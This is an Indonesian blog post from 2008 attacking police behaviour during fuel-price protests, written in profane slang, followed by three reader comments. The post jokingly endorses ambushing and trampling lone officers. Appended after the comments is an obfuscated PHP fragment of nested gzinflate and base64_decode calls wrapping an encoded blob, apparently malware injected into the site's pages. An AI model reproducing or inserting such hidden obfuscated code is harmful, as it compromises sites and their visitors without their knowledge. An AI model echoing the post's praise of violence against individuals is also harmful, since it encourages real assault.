Delicious

Archives

Categories

Mahasiswa VS Polisi.

  ozzie / 31/05/2008


bentar l-) gi ngumpulin bahan2.. l-) soale gw jg masih mahasiswa.. :>

hmmm..:-?:-?.. masih anget-angetnya masalah BBM8-|… pada ngeliat kan pemberitaan di media??:>.. gimanah anarkis nya para penegak hukum republik indonesia tercinta ini?.. dari semenjak lengsernya orde baru develop nya presiden RI ke 2 SOEHARTO (RIP).. gi ngapain yak beliau?? 8->8->.. konser bareng jimmy hendrix, janis joplin, kurt cobain kali..8-}8-}..

Mengapa setiap demo selalu berakhir rusuh??? :-/:-/.. karena para pedemo (Mahasiswa, buruh, dan rakyat..) ingin aspirasinya di dengerin jing..:-w:-w.. pada budek kali wakil rakyat dimari.. ;));));)).. mentang-mentang udah punya jabatan.. :-<:-<:-<.. intinya cuman itu… lalu mengapa selalu bentrok dengan Aparat Keparat??.. :-/.. karena meraka berusaha menghalang-halangi dan menghambat gerak dari pen-demo dalam menyuarakan aspirasinya…

mungkin kalo Penegak hukum di negara ini ngerti gak bakalan terjadi bentrok.. 8->8->8->.. merasa bangga di balik seragam kolekan rakyat :-&:-&:-&.. dan berdalih mengamankan.. tai.com =))=))=))… dan berani nya gerombolan dalam regu.. :-j:-j:-j lemahh… culik aja kalo lagi sendirian;));)).. injek-injek <:-p<:-p<:-p (inget tragedi Trisakti dan era Reformasi;));)).. aparat pake kostum loreng-loreng dan polisi jatoh dalam usaha mengamankan diri8-}8-}8-}.. hingga di injek-injek oleh rakyat, mahasiswa dan di pukulin pake tongkatnya sendiri 8-}8-} senjata makan tuan =))=))=))=)).. mamposs 8-}8-}.. makanya jangan berani nya kalo megang senjata doang 8-}8-}.. untung gak di tembak di tempat tuh aparat;));)).. giliran mahasiswa di babi buta pake peluru…:-s:-s siapa yg anarkis??? :-/ ) dan hingga akhirnya.. meng kambing hitamkan mahasiswa yang melakukan aksi anarki #-o#-o

kalo polisi sih udah ketauan kayak eek … =))=))=)) gak yang polantas.. ampe yg bener-bener binatang …

kayak liriknya Anti-Military:
“Aparat keparat.. Militer Bangsat… Polisi.. Anjing Tai Kucing”

mungkin yg pernah demo… tau lagu itu ;));));))

mungkin segituh ajah.. dengan melihat fakta di lapangan dan media massa… dan sebagai rakyat yang di bungkam oleh pembelaan para pejabat negara.. dengan dalil prosedur penegak hukum.:-s:-s Piss aahh :)>-:)>-


« »


3 Responses to “Mahasiswa VS Polisi.”

  1. irul Says:

    Waaw… =D>

  2. KieN Says:

    weks…diciduk lo ama tai kucing 8-}

  3. dedyeuy Says:

    ati..ati ozz nanti di culik ma polisi lo.. ;))


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>